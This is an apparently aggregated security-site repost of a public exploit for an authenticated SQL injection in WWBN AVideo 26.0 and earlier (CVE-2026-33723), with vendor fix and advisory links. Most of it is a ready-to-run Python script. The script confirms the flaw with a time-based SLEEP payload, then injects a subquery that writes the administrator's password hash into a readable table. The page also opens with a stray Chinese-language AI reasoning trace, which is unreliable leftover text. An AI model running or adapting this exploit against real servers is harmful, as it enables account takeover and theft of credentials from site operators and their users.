WWBN AVideo < = 26.0 - Authenticated SQL Injection
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户给了一段看起来是关于一个SQL注入漏洞的详细信息,包括漏洞标题、CVE编号、作者信息、漏洞描述、利用步骤和修复版本等。 首先,我需要理解文章的主要内容。这篇文章描述了WWBN AVideo软件中存在一个认证SQL注入漏洞,影响版本26.0及以下。攻击者可以通过user_id参数注入SQL代码,窃取管理员密码哈希和敏感数据。利用该漏洞需要有效的PHPSESSID,通常来自已登录的用户。修复版本已经发布,并提供了具体的提交链接。 接下来,我需要将这些信息浓缩到100字以内。要抓住关键点:软件名称、漏洞类型、影响范围、攻击方式、所需条件以及修复情况。 可能的结构是:WWBN AVideo <=26.0存在认证SQL注入漏洞,允许攻击者通过user_id参数提取管理员密码哈希和敏感数据,需有效PHPSESSID。已修复于特定提交。 现在检查字数是否在限制内,并确保所有关键点都涵盖。 </think> WWBN AVideo <=26.0 存在认证SQL注入漏洞,允许攻击者通过user_id参数提取管理员密码哈希和敏感数据,需有效PHPSESSID。已修复于特定提交。 2026-3-26 08:54:7 Author: cxsecurity.com(查看原文) 阅读量:8 收藏

Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection CVE: CVE-2026-33723 Date: 2026-03-25 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamer_security Author GitHub: https://github.com/mbanyamer Author Blog: https://banyamersecurity.com/blog/ Vendor Homepage: https://github.com/WWBN/AVideo Software Link: https://github.com/WWBN/AVideo Affected: AVideo <= 26.0 Tested on: AVideo 26.0 Category: Web Application Platform: Linux / Windows Exploit Type: SQL Injection CVSS: 7.1 HIGH Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data. Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c Notes: • Requires valid PHPSESSID from any logged-in user (regular user is enough) • Injects data into the subscribes.email column How to Use Step 1: Login to AVideo with any user account and copy the PHPSESSID cookie value Step 2: Edit TARGET and PHPSESSID variables in the exploit script, then run it === Full Python Exploit === #!/usr/bin/env python3 # Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection # CVE: CVE-2026-33723 # Date: 2026-03-25 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://github.com/WWBN/AVideo # Software Link: https://github.com/WWBN/AVideo # Affected: AVideo <= 26.0 # Tested on: AVideo 26.0 # Category: Web Application # Platform: Linux / Windows # Exploit Type: SQL Injection # CVSS: 7.1 # Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data. # Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c # Usage: # python3 exploit.py def banner(): print(r""" ╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗ ║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║ ║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝ ║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╔═╗ Banyamer Security ╔═╗ """) import requests import sys import time TARGET = "https://target.com" PHPSESSID = "YOUR_VALID_PHPSESSID_HERE" HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded", } COOKIES = {"PHPSESSID": PHPSESSID} def send_payload(payload, endpoint="/objects/subscribe.json.php"): data = {"user_id": payload} url = TARGET.rstrip("/") + endpoint try: r = requests.post(url, data=data, cookies=COOKIES, headers=HEADERS, timeout=15) return r except Exception as e: print(f"[-] Error: {e}") return None def main(): banner() if not PHPSESSID or PHPSESSID == "YOUR_VALID_PHPSESSID_HERE": print("[-] Please edit the script and set your valid PHPSESSID!") sys.exit(1) print(f"[*] Target : {TARGET}") print(f"[*] Session : {PHPSESSID[:15]}...\n") print("[+] Testing Time-Based SQL Injection...") start = time.time() send_payload("99999'+AND+SLEEP(5)+AND+'1") elapsed = time.time() - start print(f" Response time: {elapsed:.2f} seconds") if elapsed >= 4.5: print(" [+] Vulnerable! Time-based SQLi confirmed.") else: print(" [-] Not vulnerable or blocked.") print("\n" + "="*70) print("[+] Extracting Admin Password Hash...") extract_payload = "99999',(SELECT pass FROM users WHERE isAdmin=1 LIMIT 1),'a','1.1.1.1',now(),now(),'1'); -- -" send_payload(extract_payload) print(" [+] Payload sent successfully!") print(" [+] Admin password hash has been injected into the 'subscribes' table (email column).") print(" [+] Check your subscriptions or database to retrieve the hash.") print("\n[+] Exploit finished. Use responsibly!") if __name__ == "__main__": main()

References:

https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h

https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c




 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026030031
如有侵权请联系:admin#unsafe.sh